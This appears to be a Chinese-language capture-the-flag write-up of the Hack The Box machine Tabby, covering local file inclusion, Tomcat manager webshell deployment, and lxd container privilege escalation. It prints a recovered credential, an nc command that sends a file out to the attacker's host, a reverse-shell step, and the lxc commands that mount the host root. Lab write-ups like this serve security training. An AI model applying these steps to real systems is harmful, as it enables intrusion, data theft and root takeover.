Linux/Tabby

发布时间:2024年01月23日

Enumeration

nmap

已知目标开放了22,80,8080端口,扫描详细情况如下

TCP/80

显示80和8080分别是Apache和Tomcat,而22是ssh,Apache页面如下

页面上有些链接指向http://megahosting.htb/news.php?file=statement,因为无 法进行域名解析,因此出现错误

在/etc/hosts文件中添加10.10.10.194 megahosting.htb

之后,可以看到两句话,从url看那两句话是从statement文件中来的,测试是否存在本地文件包含漏洞

验证确实存在文件包含漏洞,读取了/etc/passwd文件,并且发现了一个id为 1000的用户ash

TCP/8080

点击接口,发现了manager目录,这时Tomcat的管理页面,但是需要认证

点击cancel取消登录,会收到401,提示凭据在/conf/tomcat-users.xml中

而在刚开始,8080端口展示的首页上,可以发现tomcat的安装路径,即/usr/ share/tomcat9

因为刚才存在文件包含漏洞,所以可以查看对应的配置文件,但是执行后却发 现什么都没有

尝试搜索tomcat9还有什么其他的目录,有可能该xml文件放在其他路径下,在 网上搜索发现了一个新的目录

然后利用文件包含漏洞,得到了一组用户名和密码tomcat:$3cureP4s5w0rd123!

根据后面的roles可知,仅允许admin-gui,manager-script,也就是说无法访问管理器webapp

根据提示,尝试扫描web目录,使用dirsearch发现了以下几个目录

在google搜索tomcat9 /manager/text,返回了一个tomcat的官方操作文档,显示 可以操作一些命令

尝试用以上命令查看tomcat上的可用虚拟主机,可以看到命令确实起作用了

继续搜索能否使用text接口来部署webshell,还是在官方操作文档中,可以找到 对应方法,先生成payloads

生成payloads的指令在reverse shell generator

然后使用下面的命令部署webshell

之后用nc开启监听,然后访问http://10.10.10.194:8080/vegetable,即可获取 shell,然后在生成一个交互式shell

Lateral Movement

也是因为题目问到了16162020_backup.zip的密码,然后确实在/var/www/html/ files中发现了这个压缩包

使用nc将该zip文件传送至本地,先计算md5的hash和,然后传送文件 nc -nv 10.10.14.13 1234 < 16162020_backup.zip

同时在本地开启监听,接收文件,并计算hash和,确保两个hash和是相同的 nc -nvlp 1234 > 16162020_backup.zip

然后使用fcrackzip破解得到压缩文件的密码

可以看到该zip文件属于ash用户,考虑压缩包密码复用

尝试用该密码切换用户ash

Privilege Escalation

运行id命令发现用户组中有一个lxd

lxd(Linux Daemon)是一个系统容器管理器,控制 lxc(Linux Container)。 Linux 容器 (LXC) 是一种使用单个 Linux 内核运行隔离容器的虚拟化技术。用户 ash可以创建一个特权容器,然后使用它来挂载主机文件系统。

查看发现系统并不存在任何容器

因此可以现在本地构建Alpine镜像,然后上传至目标,参考https://github.com/ saghul/lxd-alpine-builder,下载好按照说明做就行了

将.tar.gz包上传至目标,使用python开启http服务并下载

首先需要运行lxd init,所有选项都选择默认

检查镜像列表

按照下面的指令执行,先创建容器,挂载root目录,然后启动容器

lxc init alpine mycontainer -c security.privileged=true

lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

lxc start mycontainer

执行完指令后,可以检查看看容器是否正在运行

容器运行成功,接着就可以访问它 lxc exec mycontainer /bin/sh

我们可以查看root.txt

文章来源:https://blog.csdn.net/weixin_45557138/article/details/135763808
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。